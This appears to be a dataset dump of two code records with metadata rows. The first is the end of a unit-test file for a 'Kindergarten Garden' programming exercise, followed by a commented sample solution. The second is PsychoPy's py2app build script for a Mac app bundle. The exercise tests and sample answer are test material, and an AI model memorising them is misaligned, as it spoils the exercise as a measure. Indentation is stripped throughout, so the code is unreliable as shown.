Garden("RC\nGG").plants("Alice"),
"Radishes Clover Grass Grass".split())
def test_different_garden_with_single_student(self):
self.assertEqual(
Garden("VC\nRC").plants("Alice"),
"Violets Clover Radishes Clover".split())
def test_garden_with_two_students(self):
garden = Garden("VVCG\nVVRC")
self.assertEqual(
garden.plants("Bob"), "Clover Grass Radishes Clover".split())
def test_multiple_students_for_the_same_garden_with_three_students(self):
garden = Garden("VVCCGG\nVVCCGG")
self.assertEqual(garden.plants("Bob"), ["Clover"] * 4)
self.assertEqual(garden.plants("Charlie"), ["Grass"] * 4)
def test_full_garden(self):
garden = Garden("VRCGVVRVCGGCCGVRGCVCGCGV\nVRCCCGCRRGVCGCRVVCVGCGCV")
self.assertEqual(
garden.plants("Alice"),
"Violets Radishes Violets Radishes".split())
self.assertEqual(
garden.plants("Bob"), "Clover Grass Clover Clover".split())
self.assertEqual(
garden.plants("Kincaid"), "Grass Clover Clover Grass".split())
self.assertEqual(
garden.plants("Larry"), "Grass Violets Clover Violets".split())
# Additional tests for this track
def test_disordered_test(self):
garden = Garden(
"VCRRGVRG\nRVGCCGCV",
students="Samantha Patricia Xander Roger".split())
self.assertEqual(
garden.plants("Patricia"),
"Violets Clover Radishes Violets".split())
self.assertEqual(
garden.plants("Xander"), "Radishes Grass Clover Violets".split())
if __name__ == '__main__':
unittest.main()
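
# A minimal Garden sketch that satisfies the tests above (illustrative only,
# not the reference solution; kept as a comment so it does not shadow the
# imported Garden):
#
#   class Garden(object):
#       DEFAULT_STUDENTS = ("Alice Bob Charlie David Eve Fred Ginny Harriet "
#                           "Ileana Joseph Kincaid Larry").split()
#       PLANTS = {'V': 'Violets', 'R': 'Radishes',
#                 'C': 'Clover', 'G': 'Grass'}
#
#       def __init__(self, diagram, students=None):
#           self.rows = diagram.splitlines()
#           self.students = sorted(students or self.DEFAULT_STUDENTS)
#
#       def plants(self, student):
#           i = 2 * self.students.index(student)
#           return [self.PLANTS[row[j]]
#                   for row in self.rows for j in (i, i + 1)]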
| mit | -5,124,548,345,512,507,000 | 35.555556 | 77 | 0.629179 | false | 3.209756 | true | false | false |
hoechenberger/psychopy | setupApp.py | 1 | 6565 | #!/usr/bin/env python
################
# see notes at bottom for requirements
from __future__ import absolute_import, print_function
import glob
import os
import sys
from sys import platform
from distutils.core import setup
from pkg_resources import parse_version
# import versioneer
import psychopy
version = psychopy.__version__
# regenerate __init__.py only if we're in the source repos (not in a zip file)
try:
import createInitFile # won't exist in a sdist.zip
writeNewInit=True
except:
writeNewInit=False
if writeNewInit:
vStr = createInitFile.createInitFile(dist='bdist')
#define the extensions to compile if necess
packageData = []
requires = []
if platform != 'darwin':
raise RuntimeError("setupApp.py is only for building Mac Standalone bundle")
import bdist_mpkg
import py2app
resources = glob.glob('psychopy/app/Resources/*')
resources.append('/Library/Frameworks/Python.framework/Versions/2.7/include/python2.7/pyconfig.h')
frameworks = ["libavbin.dylib", "/usr/lib/libxml2.2.dylib", #"libyaml.dylib",
"libevent.dylib", "libffi.dylib",
"libmp3lame.0.dylib",
"/usr/local/Cellar/glfw/3.2.1/lib/libglfw.3.2.dylib",
]
opencvLibs = glob.glob(os.path.join(sys.exec_prefix, 'lib', 'libopencv*.2.4.dylib'))
frameworks.extend(opencvLibs)
import macholib
#print("~"*60 + "macholib version: "+macholib.__version__)
if parse_version(macholib.__version__) <= parse_version('1.7'):
print("Applying macholib patch...")
import macholib.dyld
import macholib.MachOGraph
dyld_find_1_7 = macholib.dyld.dyld_find
def dyld_find(name, loader=None, **kwargs):
#print("~"*60 + "calling alternate dyld_find")
if loader is not None:
kwargs['loader_path'] = loader
return dyld_find_1_7(name, **kwargs)
macholib.MachOGraph.dyld_find = dyld_find
includes = ['Tkinter', 'tkFileDialog',
'imp', 'subprocess', 'shlex',
'shelve', # for scipy.io
'_elementtree', 'pyexpat', # for openpyxl
'hid',
'pyo', 'greenlet', 'zmq', 'tornado',
'psutil', # for iohub
'pysoundcard', 'soundfile', 'sounddevice',
'cv2', 'hid',
'xlwt', # writes excel files for pandas
'vlc', # install with pip install python-vlc
'msgpack_numpy',
'configparser',
]
packages = ['wx', 'psychopy',
'pyglet', 'pygame', 'pytz', 'OpenGL', 'glfw',
'scipy', 'matplotlib', 'lxml', 'xml', 'openpyxl',
'moviepy', 'imageio',
'_sounddevice_data','_soundfile_data',
'cffi','pycparser',
'PIL', # 'Image',
'objc', 'Quartz', 'AppKit', 'QTKit', 'Cocoa',
'Foundation', 'CoreFoundation',
'pkg_resources', # needed for objc
'pyolib',
'requests', 'certifi', 'cryptography',
'pyosf',
# for unit testing
'coverage',
# handy external science libs
'serial',
'egi', 'pylink',
'pyxid',
'pandas', 'tables', # 'cython',
'msgpack', 'yaml', 'gevent', # for ioHub
# these aren't needed, but liked
'psychopy_ext', 'pyfilesec',
'bidi', 'arabic_reshaper', # for right-left language conversions
# for Py3 compatibility
'future', 'past', 'lib2to3',
'json_tricks', # allows saving arrays/dates in json
'git', 'gitlab',
'astunparse', 'esprima', # for translating/adapting py/JS
'pylsl', 'pygaze',
]
if sys.version_info.major >= 3:
packages.extend(['PyQt5'])
else:
# not available or not working under Python3:
includes.extend(['UserString', 'ioLabs', 'FileDialog'])
packages.extend(['PyQt4', 'labjack', 'rusocsci'])
# is available but py2app can't seem to find it:
packages.extend(['OpenGL'])
setup(
app=['psychopy/app/psychopyApp.py'],
options=dict(py2app=dict(
includes=includes,
packages=packages,
excludes=['bsddb', 'jinja2', 'IPython','ipython_genutils','nbconvert',
'libsz.2.dylib',
# 'stringprep',
'functools32',
], # anything we need to forcibly exclude?
resources=resources,
argv_emulation=True,
site_packages=True,
frameworks=frameworks,
iconfile='psychopy/app/Resources/psychopy.icns',
plist=dict(
CFBundleIconFile='psychopy.icns',
CFBundleName = "PsychoPy3",
CFBundleShortVersionString = version, # must be in X.X.X format
CFBundleGetInfoString = "PsychoPy3 "+version,
CFBundleExecutable = "PsychoPy3",
CFBundleIdentifier = "org.psychopy.PsychoPy3",
CFBundleLicense = "GNU GPLv3+",
CFBundleDocumentTypes=[dict(CFBundleTypeExtensions=['*'],
CFBundleTypeRole='Editor')],
LSEnvironment=dict(PATH="/usr/local/git/bin:/usr/local/bin:"
"/usr/local:/usr/bin:/usr/sbin"),
),
)) # end of the options dict
)
# ugly hack for opencv2:
# As of opencv 2.4.5 the cv2.so binary used rpath to a fixed
# location to find libs and even more annoyingly it then appended
# 'lib' to the rpath as well. These were fine for the packaged
# framework python but the libs in an app bundle are different.
# So, create symlinks so they appear in the same place as in framework python
rpath = "dist/PsychoPy3.app/Contents/Resources/"
for libPath in opencvLibs:
libname = os.path.split(libPath)[-1]
realPath = "../../Frameworks/"+libname # relative path (w.r.t. the fake)
fakePath = os.path.join(rpath, "lib", libname)
os.symlink(realPath, fakePath)
# they even did this for Python lib itself, which is in diff location
realPath = "../Frameworks/Python.framework/Python" # relative to the fake path
fakePath = os.path.join(rpath, "Python")
os.symlink(realPath, fakePath)
if writeNewInit:
# remove unwanted info about this system post-build
createInitFile.createInitFile(dist=None)
# running testApp from within the app raises wx errors
# shutil.rmtree("dist/PsychoPy3.app/Contents/Resources/lib/python2.6/psychopy/tests/testTheApp")
| gpl-3.0 | -2,791,599,011,250,994,700 | 38.311377 | 98 | 0.592232 | false | 3.64925 | false | false | false |